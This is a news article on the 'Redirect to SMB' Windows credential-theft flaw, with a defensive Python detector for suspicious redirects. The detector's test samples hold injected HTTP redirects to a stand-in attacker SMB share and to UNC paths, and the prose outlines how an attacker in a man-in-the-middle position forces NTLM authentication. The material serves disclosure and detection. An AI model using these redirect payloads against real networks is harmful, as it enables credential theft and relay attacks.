New Windows Vulnerability at Large, Security Vendor Says
Security vendor Cylance recently uncovered a technique for stealing log-in credentials from Windows PCs, tablets, and servers, including those running preview builds of the not-yet-released Windows 10.
Carnegie Mellon University CERT disclosed the vulnerability, dubbed Redirect to SMB, after working privately with vendors for the past six weeks to help them mitigate it. In a Redirect to SMB attack, an attacker with a man-in-the-middle position on the victim's network traffic intercepts a Windows application's HTTP request to a legitimate web server and answers it with a redirect to a file:// URL on a malicious server message block (SMB) server; Windows follows the redirect, connects to that server, and authenticates automatically, handing over the victim's user name, domain, and a hashed form of the password (an NTLM challenge-response that the attacker can crack offline or relay to another service), wrote Brian Wallace, a Cylance software engineer, security researcher, malware analyst, and investigator of advanced threat actors, in a Cylance blog post on April 13.
The attack is fast and its attack surface is wide, researchers warn. On a Windows 8.1 laptop, for example, at least 50 different HTTP connections were made after a restart; within five minutes, most could be hijacked by a network-local attacker to force SMB authentication to a malicious server, HD Moore, Rapid7's chief research officer, told Enterprise Technology via email. The connections came from sources ranging from OEM update checks to weather and news applications, he added.
"This is a novel attack that can be easily abused to significantly increase the exploitability of Windows client systems communicating on untrusted or compromised networks. While tools like KARMA, Metasploit and Responder.py depend on the user to make a SMB connection back to the attacker, the Cylance research improves on the attack by abusing how HTTP redirects are handled by callers of the URLMon API," said Moore. "The Cylance research shows that instead of waiting for the user to open their browser or manually connect to a network share, an attacker can look for automated HTTP requests sent by background applications and redirect these to file:// URLs, triggering a SMB connection and automatic authentication. Given how many applications a typical laptop or tablet has running in the background, this can drastically speed up SMB capture and relay attacks against Windows-based laptops and tablets connecting to insecure wireless networks."
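The redirect Moore describes is visible on the wire before any SMB traffic happens: a 3xx response whose Location header names a file:// URL or a UNC path. The following is an added example, not code from Cylance, Rapid7, or CERT, showing how a proxy, IDS rule, or application test harness could flag such a response. All responses and hostnames below are constructed (192.0.2.0/24 and .example are reserved documentation values), and the check deliberately treats every remote file:// or UNC target as an alert, because whether the client actually follows it depends on which URLMon caller issued the request and cannot be seen from the HTTP leg alone.

```python
"""Flag HTTP redirects that would pull a Windows client into an SMB
authentication (the "Redirect to SMB" pattern).  Added example; the sample
responses and hostnames are constructed, not captured."""
import re
from urllib.parse import urlsplit, unquote

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
# A bare UNC path such as \\host\share\file (two leading backslashes).
_UNC_RE = re.compile(r'^\\\\([^\\/]+)(?:[\\/]|$)')
# The file:////host/share form: urlsplit leaves the host at the start of the
# path because the authority component between the first two slashes is empty.
_SLASHED_HOST_RE = re.compile(r'^/{2,}([^/]+)(?:/|$)')


def smb_target(location):
    """Return the remote host a Windows client would contact over SMB if it
    followed this Location value, or None if the target is not a remote share.
    Local file:///C:/... paths and localhost are not reported."""
    loc = unquote(location.strip())      # %5C%5C-style encodings still count
    m = _UNC_RE.match(loc)
    if m:
        return m.group(1)
    parts = urlsplit(loc)
    if parts.scheme.lower() != 'file':
        return None
    host = parts.hostname or ''          # file://host/share form
    if not host:
        m = _SLASHED_HOST_RE.match(parts.path)
        host = m.group(1) if m else ''
    if not host or host.lower() == 'localhost':
        return None
    return host


def parse_response_head(raw):
    """Split a raw HTTP response (bytes) into (status code, header dict).
    Header names are lower-cased; the body is ignored."""
    head = raw.split(b'\r\n\r\n', 1)[0].decode('latin-1')
    lines = head.split('\r\n')
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return status, headers


def redirect_to_smb_target(raw):
    """Return the SMB host a 3xx response redirects to, or None.
    A non-redirect, or a redirect to an http(s) or local target, yields None."""
    status, headers = parse_response_head(raw)
    if status not in REDIRECT_STATUSES or 'location' not in headers:
        return None
    return smb_target(headers['location'])


# Constructed sample responses as a man-in-the-middle might inject them in
# place of a background update check or content fetch.
SAMPLES = {
    "malicious_file_url": (b"HTTP/1.1 302 Found\r\n"
                           b"Location: file://attacker.example/share/update.exe\r\n"
                           b"Content-Length: 0\r\n\r\n"),
    "malicious_four_slash": (b"HTTP/1.1 301 Moved Permanently\r\n"
                             b"Location: file:////192.0.2.10/s/\r\n\r\n"),
    "malicious_unc": (b"HTTP/1.1 302 Found\r\n"
                      b"Location: \\\\192.0.2.10\\share\\x\r\n\r\n"),
    "benign_https": (b"HTTP/1.1 302 Found\r\n"
                     b"Location: https://updates.example/v2/\r\n\r\n"),
    "benign_local_file": (b"HTTP/1.1 302 Found\r\n"
                          b"Location: file:///C:/Temp/x.txt\r\n\r\n"),
    "not_a_redirect": (b"HTTP/1.1 200 OK\r\n"
                       b"Content-Type: text/plain\r\n\r\nhello"),
}


def scan(samples=SAMPLES):
    """Map each sample name to the SMB host it would leak credentials to,
    or None when the response is harmless."""
    return {name: redirect_to_smb_target(raw) for name, raw in samples.items()}


if __name__ == '__main__':
    for name, host in scan().items():
        print(f"{name:22s} -> {'ALERT ' + host if host else 'ok'}")
```

Only the three malicious samples produce a host; the https redirect, the local C: path and the 200 response all come back as None. Run against real proxy logs, an alert from this check means a client on that network was being steered toward SMB authentication, which is the moment to look for a rogue device on the segment rather than for a compromised endpoint.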
Cylance discovered Redirect to SMB while seeking ways to abuse a chat client feature for image previews, Wallace said. The team tested many applications and found 31 that were vulnerable, which it reported to CERT on Feb. 27, 2015. Among them, according to Cylance, are Adobe Reader; Apple QuickTime and Apple Software Update; Microsoft Internet Explorer, Windows Media Player, Excel 2010, and Microsoft Baseline Security Analyzer; Symantec Norton Security Scan; AVG Free; BitDefender Free; Comodo Antivirus; .NET Reflector; Maltego CE; Box Sync; TeamViewer; GitHub for Windows; PyCharm; IntelliJ IDEA; PhpStorm; and the JDK 8u31 installer.
"Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic," wrote Wallace. "Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB on shared Wi-Fi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools."
The underlying weakness is old: it dates back to a 1997 discovery by Aaron Spangler, and some developers never fully addressed it, said Wallace. Microsoft, for example, has not yet shipped a patch for Redirect to SMB, he said. One workaround, said Wallace, is to block outbound traffic to TCP ports 139 and 445 (the SMB ports) at the endpoint firewall or at the network gateway's firewall. The gateway rule only helps when the local network itself is trusted, since an attacker on the same Wi-Fi or LAN segment sits inside the gateway; for laptops and tablets that roam onto untrusted networks, the block has to live on the endpoint.
Microsoft, however, told KRRO News that the threat is not as serious as Cylance suggests.
"Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur. Our guidance was updated in a Security Research and Defense blog in 2009, to help address potential threats of this nature," said Microsoft in an emailed statement. "There are also features in Windows, such as Extended Protection for Authentication, which enhances existing defenses for handling network connection credentials."